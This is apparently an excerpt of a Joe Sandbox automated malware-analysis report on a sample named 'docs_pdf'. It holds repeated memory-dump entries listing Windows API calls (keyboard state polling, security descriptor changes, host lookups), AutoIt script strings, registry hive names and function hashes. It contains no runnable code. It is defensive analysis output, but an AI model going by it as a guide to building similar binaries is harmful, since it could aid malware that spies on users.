                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                    • String ID: *.*
                                    • API String ID: 34673085-438819550
                                    • Opcode ID: 91cb853938ddffce48c90ed575d9e6e0ce462b1060859b892f9cd2e0437a8d8e
                                    • Instruction ID: 0ac6968a37192aa02b6bcf711b98cf92b9db776ed163cd1ac18f01f35f7f4593
                                    • Opcode Fuzzy Hash: 91cb853938ddffce48c90ed575d9e6e0ce462b1060859b892f9cd2e0437a8d8e
                                    • Instruction Fuzzy Hash: F181B471504245DFD764EFA8C8899AEB7E8BB88300F088C6EF5C6C7255E738E944CB52
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0103C4EC
                                    • GetFocus.USER32 ref: 0103C4FC
                                    • GetDlgCtrlID.USER32(00000000), ref: 0103C507
                                    • _memset.LIBCMT ref: 0103C632
                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0103C65D
                                    • GetMenuItemCount.USER32(?), ref: 0103C67D
                                    • GetMenuItemID.USER32(?,00000000), ref: 0103C690
                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0103C6C4
                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0103C70C
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0103C744
                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0103C779
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                    • String ID: 0
                                    • API String ID: 1296962147-4108050209
                                    • Opcode ID: ea69deff5839922b5bb0beafe5ca4e875265fec925bb24426e1a0e04370d5901
                                    • Instruction ID: 4b09ea8cadd347c70f966040660f719fa82b4bf65925db308d9b6036d2e82ef2
                                    • Opcode Fuzzy Hash: ea69deff5839922b5bb0beafe5ca4e875265fec925bb24426e1a0e04370d5901
                                    • Instruction Fuzzy Hash: 8F816A706083019FE761DF28CA84AAABBE8FBC8354F00055EFAD5E3291D731D905DB92
                                    APIs
                                      • Part of subcall function 0100874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01008766
                                      • Part of subcall function 0100874A: GetLastError.KERNEL32(?,0100822A,?,?,?), ref: 01008770
                                      • Part of subcall function 0100874A: GetProcessHeap.KERNEL32(00000008,?,?,0100822A,?,?,?), ref: 0100877F
                                      • Part of subcall function 0100874A: HeapAlloc.KERNEL32(00000000,?,0100822A,?,?,?), ref: 01008786
                                      • Part of subcall function 0100874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100879D
                                      • Part of subcall function 010087E7: GetProcessHeap.KERNEL32(00000008,01008240,00000000,00000000,?,01008240,?), ref: 010087F3
                                      • Part of subcall function 010087E7: HeapAlloc.KERNEL32(00000000,?,01008240,?), ref: 010087FA
                                      • Part of subcall function 010087E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01008240,?), ref: 0100880B
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01008458
                                    • _memset.LIBCMT ref: 0100846D
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0100848C
                                    • GetLengthSid.ADVAPI32(?), ref: 0100849D
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 010084DA
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010084F6
                                    • GetLengthSid.ADVAPI32(?), ref: 01008513
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 01008522
                                    • HeapAlloc.KERNEL32(00000000), ref: 01008529
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0100854A
                                    • CopySid.ADVAPI32(00000000), ref: 01008551
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01008582
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 010085A8
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 010085BC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 3996160137-0
                                    • Opcode ID: fec9feb719b9fc856265f39d6953300b56a90f6b707aecda5f18d3ddae9a8d0d
                                    • Instruction ID: 676c4f6f9c680fd30359002e446440593dbc76e99bb403fcac0158fc1bd84311
                                    • Opcode Fuzzy Hash: fec9feb719b9fc856265f39d6953300b56a90f6b707aecda5f18d3ddae9a8d0d
                                    • Instruction Fuzzy Hash: 03614E71D0020AAFEF11DF98DC44AEEBBB9FF04201F04816AF955A7294DB369A15CF60
                                    APIs
                                    • GetDC.USER32(00000000), ref: 010276A2
                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 010276AE
                                    • CreateCompatibleDC.GDI32(?), ref: 010276BA
                                    • SelectObject.GDI32(00000000,?), ref: 010276C7
                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0102771B
                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01027757
                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0102777B
                                    • SelectObject.GDI32(00000006,?), ref: 01027783
                                    • DeleteObject.GDI32(?), ref: 0102778C
                                    • DeleteDC.GDI32(00000006), ref: 01027793
                                    • ReleaseDC.USER32(00000000,?), ref: 0102779E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                    • String ID: (
                                    • API String ID: 2598888154-3887548279
                                    • Opcode ID: 92c189017b168c62010163154e421e9794dfba2ec95a25830c6de770fdad0730
                                    • Instruction ID: 85d77df2a335075525e90701f4537ef04b2c41ff75d4f9f07686c6ccbeed408a
                                    • Opcode Fuzzy Hash: 92c189017b168c62010163154e421e9794dfba2ec95a25830c6de770fdad0730
                                    • Instruction Fuzzy Hash: 4D514A75900319EFDB25CFA8D888EAEBBB9FF48710F14851DF99A97210D735A840CB60
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,0103FB78), ref: 0101A0FC
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 0101A11E
                                    • __swprintf.LIBCMT ref: 0101A177
                                    • __swprintf.LIBCMT ref: 0101A190
                                    • _wprintf.LIBCMT ref: 0101A246
                                    • _wprintf.LIBCMT ref: 0101A264
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 311963372-2391861430
                                    • Opcode ID: 6900104a3bced209779dfd23fc2c24d1ad8ca39915f525dd82b238b5412eb3b3
                                    • Instruction ID: 5d9eda30dc0e98870dfa9cf0d5dd870f61c578520a07ac82eb30e0303400ddab
                                    • Opcode Fuzzy Hash: 6900104a3bced209779dfd23fc2c24d1ad8ca39915f525dd82b238b5412eb3b3
                                    • Instruction Fuzzy Hash: 47516B7190060AAADF15FBA5CD82EEEB779AF04300F1001A5F54573191EB3A6F48EFA1
                                    APIs
                                      • Part of subcall function 00FD0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FB6C6C,?,00008000), ref: 00FD0BB7
                                      • Part of subcall function 00FB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB48A1,?,?,00FB37C0,?), ref: 00FB48CE
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FB6D0D
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB6E5A
                                      • Part of subcall function 00FB59CD: _wcscpy.LIBCMT ref: 00FB5A05
                                      • Part of subcall function 00FD387D: _iswctype.LIBCMT ref: 00FD3885
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                    • API String ID: 537147316-1018226102
                                    • Opcode ID: 0bf37cf02a0582c88415791ebf4b707fd0ef812e7aa04ea8163adccc850ff195
                                    • Instruction ID: be3c2f51ebf308da855278f63968c54310d4e53f4b60d1cae1c8706bf814a5f8
                                    • Opcode Fuzzy Hash: 0bf37cf02a0582c88415791ebf4b707fd0ef812e7aa04ea8163adccc850ff195
                                    • Instruction Fuzzy Hash: E20278315083819FC724EF26C881AAFBBE5BF98714F14491DF486972A1DB38D949EF42
                                    APIs
                                    • _memset.LIBCMT ref: 00FB45F9
                                    • GetMenuItemCount.USER32(01076890), ref: 00FED7CD
                                    • GetMenuItemCount.USER32(01076890), ref: 00FED87D
                                    • GetCursorPos.USER32(?), ref: 00FED8C1
                                    • SetForegroundWindow.USER32(00000000), ref: 00FED8CA
                                    • TrackPopupMenuEx.USER32(01076890,00000000,?,00000000,00000000,00000000), ref: 00FED8DD
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FED8E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                    • String ID:
                                    • API String ID: 2751501086-0
                                    • Opcode ID: eed724de8e3ea21646ccbda05b2141b5b9535c23694027a144c5daf3d176a0f3
                                    • Instruction ID: 45b61fd9ea14afbca4c2bfc7921c1550393e36722db01d22e866554058c8ff44
                                    • Opcode Fuzzy Hash: eed724de8e3ea21646ccbda05b2141b5b9535c23694027a144c5daf3d176a0f3
                                    • Instruction Fuzzy Hash: 4371E471A01246BAEB309F26DC45FEABF69FF05364F200216F514A61E1C7B56810EB91
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,01030038,?,?), ref: 010310BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 3964851224-909552448
                                    • Opcode ID: 72dd9600183063fc774cf0ef94ef8e81c6cd6c188f0ad7e956d6098b3dd6f9fe
                                    • Instruction ID: 750075c3802c8c7445a07c9f1c4e6b6b6511185cab70c49f81d3b88d4f0ffa2a
                                    • Opcode Fuzzy Hash: 72dd9600183063fc774cf0ef94ef8e81c6cd6c188f0ad7e956d6098b3dd6f9fe
                                    • Instruction Fuzzy Hash: 1141617020024ADBDF11EFA4DC81AEE376ABF89340F444456FCD19B252DF34A91ADB60
                                    APIs
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                      • Part of subcall function 00FB7A84: _memmove.LIBCMT ref: 00FB7B0D
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 010155D2
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 010155E8
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 010155F9
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0101560B
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0101561C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: SendString$_memmove
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 2279737902-1007645807
                                    • Opcode ID: c8e55beba32aa4d6d788d44ea3e5832f3f2435aa5f7cb03477a9c8f2d414eb5e
                                    • Instruction ID: f55657288c3010a2227897b7b43237b9d4f7374785f959e35876a3b3da22ac6e
                                    • Opcode Fuzzy Hash: c8e55beba32aa4d6d788d44ea3e5832f3f2435aa5f7cb03477a9c8f2d414eb5e
                                    • Instruction Fuzzy Hash: 78118220A50269B9D720B667DC8ADFFBF7CEFD6B00F004459B481AB095DEA85905C9A1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                    • String ID: 0.0.0.0
                                    • API String ID: 208665112-3771769585
                                    • Opcode ID: 8eb991664e7e6be4b06c449cfb6f2d8cdb32eeefc9615b2e01ed687d27193389
                                    • Instruction ID: dce81e466a7b024cfb912c718c6113b9e560937d3f207b7dce115fc9e7f59d05
                                    • Opcode Fuzzy Hash: 8eb991664e7e6be4b06c449cfb6f2d8cdb32eeefc9615b2e01ed687d27193389
                                    • Instruction Fuzzy Hash: B3112731904115ABCB25EB24EC0AEDE77FEEF40710F0801A6F488D6169EF7D9A8197A1
                                    APIs
                                    • timeGetTime.WINMM ref: 0101521C
                                      • Part of subcall function 00FD0719: timeGetTime.WINMM(?,75C0B400,00FC0FF9), ref: 00FD071D
                                    • Sleep.KERNEL32(0000000A), ref: 01015248
                                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0101526C
                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0101528E
                                    • SetActiveWindow.USER32 ref: 010152AD
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 010152BB
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 010152DA
                                    • Sleep.KERNEL32(000000FA), ref: 010152E5
                                    • IsWindow.USER32 ref: 010152F1
                                    • EndDialog.USER32(00000000), ref: 01015302
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: b83c2e7ee32543476774d7ed3352428426a918b9f6d5d2d57d05acc58793eaf4
                                    • Instruction ID: c4cb926361c3c059f4f25ba3ffc20c5d929f9ac12323fae62e3084ae5b39d8ae
                                    • Opcode Fuzzy Hash: b83c2e7ee32543476774d7ed3352428426a918b9f6d5d2d57d05acc58793eaf4
                                    • Instruction Fuzzy Hash: 7A21F97190030AAFE7215F30ED8CB653B6DF78A386F401058F1C19A19CEBAF5C009722
                                    APIs
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • CoInitialize.OLE32(00000000), ref: 0101D855
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0101D8E8
                                    • SHGetDesktopFolder.SHELL32(?), ref: 0101D8FC
                                    • CoCreateInstance.OLE32(01042D7C,00000000,00000001,0106A89C,?), ref: 0101D948
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0101D9B7
                                    • CoTaskMemFree.OLE32(?,?), ref: 0101DA0F
                                    • _memset.LIBCMT ref: 0101DA4C
                                    • SHBrowseForFolderW.SHELL32(?), ref: 0101DA88
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0101DAAB
                                    • CoTaskMemFree.OLE32(00000000), ref: 0101DAB2
                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0101DAE9
                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0101DAEB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                    • String ID:
                                    • API String ID: 1246142700-0
                                    • Opcode ID: ec7584a3e0b8b4f7bd8dc60a5dc35c977e32ac854dcea35a75c334d0de3c5f95
                                    • Instruction ID: e63264f9f58aacee2956d4f8da53fcabed36f1257f22fcd4460fa99af57379e5
                                    • Opcode Fuzzy Hash: ec7584a3e0b8b4f7bd8dc60a5dc35c977e32ac854dcea35a75c334d0de3c5f95
                                    • Instruction Fuzzy Hash: B8B1FB75A00109AFDB14DFA5C888DAEBBF9FF48304B048499F949EB251DB35ED41CB50
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 010105A7
                                    • SetKeyboardState.USER32(?), ref: 01010612
                                    • GetAsyncKeyState.USER32(000000A0), ref: 01010632
                                    • GetKeyState.USER32(000000A0), ref: 01010649
                                    • GetAsyncKeyState.USER32(000000A1), ref: 01010678
                                    • GetKeyState.USER32(000000A1), ref: 01010689
                                    • GetAsyncKeyState.USER32(00000011), ref: 010106B5
                                    • GetKeyState.USER32(00000011), ref: 010106C3
                                    • GetAsyncKeyState.USER32(00000012), ref: 010106EC
                                    • GetKeyState.USER32(00000012), ref: 010106FA
                                    • GetAsyncKeyState.USER32(0000005B), ref: 01010723
                                    • GetKeyState.USER32(0000005B), ref: 01010731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: e9574f415c041cecfbf426f3827c39034407340d07104e5d1ea1c1e8cedcdf03
                                    • Instruction ID: a049a29c62a554ef0c8768be95b87b75e104e52fac6cf34318382b8098bee588
                                    • Opcode Fuzzy Hash: e9574f415c041cecfbf426f3827c39034407340d07104e5d1ea1c1e8cedcdf03
                                    • Instruction Fuzzy Hash: 0351EC30A0478919FB75DBB488547EABFF49F41280F0885DADAC2561CEDA6C97CCCB52
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 0100C746
                                    • GetWindowRect.USER32(00000000,?), ref: 0100C758
                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0100C7B6
                                    • GetDlgItem.USER32(?,00000002), ref: 0100C7C1
                                    • GetWindowRect.USER32(00000000,?), ref: 0100C7D3
                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0100C827
                                    • GetDlgItem.USER32(?,000003E9), ref: 0100C835
                                    • GetWindowRect.USER32(00000000,?), ref: 0100C846
                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0100C889
                                    • GetDlgItem.USER32(?,000003EA), ref: 0100C897
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0100C8B4
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0100C8C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: c5c975945c30309b611b6b658a36bf384995802a29e971cc721a208b8de3380a
                                    • Instruction ID: 04210b829aa96817fa2bb6410085b6eaff9bb7378a9c76dd8a0bfefbff635922
                                    • Opcode Fuzzy Hash: c5c975945c30309b611b6b658a36bf384995802a29e971cc721a208b8de3380a
                                    • Instruction Fuzzy Hash: FB514171B00205ABEB19CF7CDD89AAEBBBAFB88310F14826DF655D62D4D77599008B10
                                    APIs
